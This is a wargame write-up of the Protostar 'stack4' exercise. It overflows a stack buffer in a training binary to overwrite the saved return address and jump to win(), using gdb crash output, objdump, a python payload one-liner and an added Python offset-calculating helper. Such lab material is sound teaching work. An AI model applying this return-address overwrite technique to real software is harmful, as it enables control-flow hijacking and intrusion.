Protostar – stack4
This exercise looks at overwriting the saved return address (what ends up in EIP), which sits just past the saved EBP (and possibly some padding after the buffer), so we’ll need to determine its offset from the start of our input. Let’s piss all over the stack with an 80-character pwgen string and see what lands in the registers:
0.08 0.14 0.10 root kali ➜ ~ pwgen 80
as6xoz0aengohBe0sieNg1ifoh7moeNgiZi5tahkeif2ohD5shaeKohbi5thoohie5keona2se0aib4g

gdb$ run as6xoz0aengohBe0sieNg1ifoh7moeNgiZi5tahkeif2ohD5shaeKohbi5thoohie5keona2se0aib4g

Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
  EAX: 0xBFFFF740  EBX: 0xB7FD7FF4  ECX: 0xBFFFF740  EDX: 0xB7FD9334  o d I t s Z a P c
  ESI: 0x00000000  EDI: 0x00000000  EBP: 0x61306573  ESP: 0xBFFFF790  EIP: 0x67346269
  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
Error while running hook_stop:
Cannot access memory at address 0x67346269
0x67346269 in ?? ()
gdb$
0x67346269 is “g4bi”, i.e. the bytes “ib4g” from the very end of the string we shoved in, read back little-endian as a 32-bit value. (EBP holds 0x61306573, “se0a”, the four bytes just before them.) Let’s find the address of win():
user@protostar:/opt/protostar/bin$ objdump -S stack4 | grep "win"
080483f4 <win>:
Fun. Let’s put that address, written little-endian, in place of the “ib4g” bytes that ended up in EIP:
user@protostar:/opt/protostar/bin$ python -c 'print("......ohbi5thoohie5keona2se0a\xf4\x83\x04\x08");' > /tmp/stack4_trick
user@protostar:/opt/protostar/bin$ gdb stack4
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack4...done.
gdb$ run < /tmp/stack4_trick
code flow successfully changed

Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
  EAX: 0x0000001F  EBX: 0xB7FD7FF4  ECX: 0xB7FD84C0  EDX: 0xB7FD9340  o d I t s Z a P c
  ESI: 0x00000000  EDI: 0x00000000  EBP: 0x61306573  ESP: 0xBFFFF794  EIP: 0x00000000
  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
Error while running hook_stop:
Cannot access memory at address 0x0
0x00000000 in ?? ()
gdb$
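As an added check on the offsets used above (this helper is not part of the original post), here is a small Python script that does the little-endian bookkeeping in code: it turns the crash registers back into the pattern bytes that produced them and locates those bytes in the pwgen string, which puts the saved EBP at offset 72 and the return address at offset 76. The pattern and register values are copied from the gdb output; the uniqueness check on the 4-byte chunk is the one thing worth adding when the pattern is not a proper cyclic one.

```python
import struct

# Constructed from the post: the 80-character pwgen string fed to stack4 and
# the register values gdb printed after the crash.
PATTERN = b"as6xoz0aengohBe0sieNg1ifoh7moeNgiZi5tahkeif2ohD5shaeKohbi5thoohie5keona2se0aib4g"
CRASH_EIP = 0x67346269  # gdb shows "g4bi" when read as a number
CRASH_EBP = 0x61306573  # "se0a"


def reg_to_bytes(value: int) -> bytes:
    """Return the stack bytes that produced this 32-bit register value.

    x86 is little-endian: the lowest byte of the register came from the
    lowest stack address, so 0x67346269 was stored as b"ib4g".
    """
    return struct.pack("<I", value)


def pattern_offset(pattern: bytes, value: int) -> int:
    """Index in `pattern` of the 4 bytes that landed in a register, or -1.

    A random (non-cyclic) pattern like pwgen's could contain the same
    4-byte chunk twice, which would make the offset ambiguous, so refuse
    that case instead of silently returning the first hit.
    """
    needle = reg_to_bytes(value)
    idx = pattern.find(needle)
    if idx != -1 and pattern.find(needle, idx + 1) != -1:
        raise ValueError(f"{needle!r} occurs more than once; use a unique pattern")
    return idx


def frame_layout(pattern: bytes, ebp: int, eip: int) -> dict:
    """Derive where the saved EBP and return address sit in the input."""
    ebp_off = pattern_offset(pattern, ebp)
    ret_off = pattern_offset(pattern, eip)
    if ebp_off == -1 or ret_off == -1:
        raise ValueError("register value not found in pattern")
    return {
        "saved_ebp": ebp_off,
        "return_address": ret_off,
        # In a standard frame the saved EBP is the dword right before the
        # return address; if this is False the overwrite did not come
        # from a plain linear overflow and the offsets should be doubted.
        "contiguous": ret_off == ebp_off + 4,
    }


if __name__ == "__main__":
    print(reg_to_bytes(CRASH_EIP))                      # b'ib4g'
    print(frame_layout(PATTERN, CRASH_EBP, CRASH_EIP))  # 72, 76, True
```

The gap between the start of the input and offset 72 is the buffer plus whatever alignment padding the compiler put before the saved EBP, which is why the author hedges with "possibly some padding".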
Angel.